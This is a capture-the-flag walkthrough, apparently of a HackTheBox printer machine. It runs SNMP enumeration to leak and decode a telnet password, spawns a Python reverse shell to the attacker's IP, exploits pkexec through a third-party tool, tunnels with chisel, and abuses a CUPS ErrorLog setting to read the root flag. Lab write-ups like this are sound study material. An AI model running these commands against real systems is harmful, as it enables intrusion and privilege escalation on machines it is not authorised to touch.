Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.107 | TCP:23,161 |
$ ip='10.10.11.107'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
161/tcp open snmp
SNMP MIB
$ snmpwalk -v 2c -c public 10.10.11.107
$ snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
.1.3.6.1.4.1.11.2.3.9.1.1.13.0 的作用
这个 OID 指向一个 HP JetDirect 打印机设备的 MIB 中的特定对象。根据设备的实现和配置,这个 OID 可能包含 Telnet 密码 或者其他敏感信息。
$ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | tr -d ' ' | xxd -r -p
P@ssw0rd@123!!123
$ telnet 10.10.11.107
> exec python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.28",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
User.txt
c49ff9dd42d672d82438cd34d246d4ef
Privilege Escalation:TRP00F && CPUS 1.6.1
TRP00F
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999
[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y
CPUS 1.6.1
lp@antique:~$ ss -lnput
$ sudo chisel server --port 10031 --reverse
$ ./chisel_1.10.1_linux_amd64 client 10.10.16.28:10031 R:631:127.0.0.1:631
lp@antique:/tmp$ cupsctl ErrorLog="/root/root.txt"
lp@antique:/tmp$ curl http://127.0.0.1:631/admin/log/error_log
Root.txt
f722a52be88fe7afe38d366fa88846c9
扫一扫
354
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
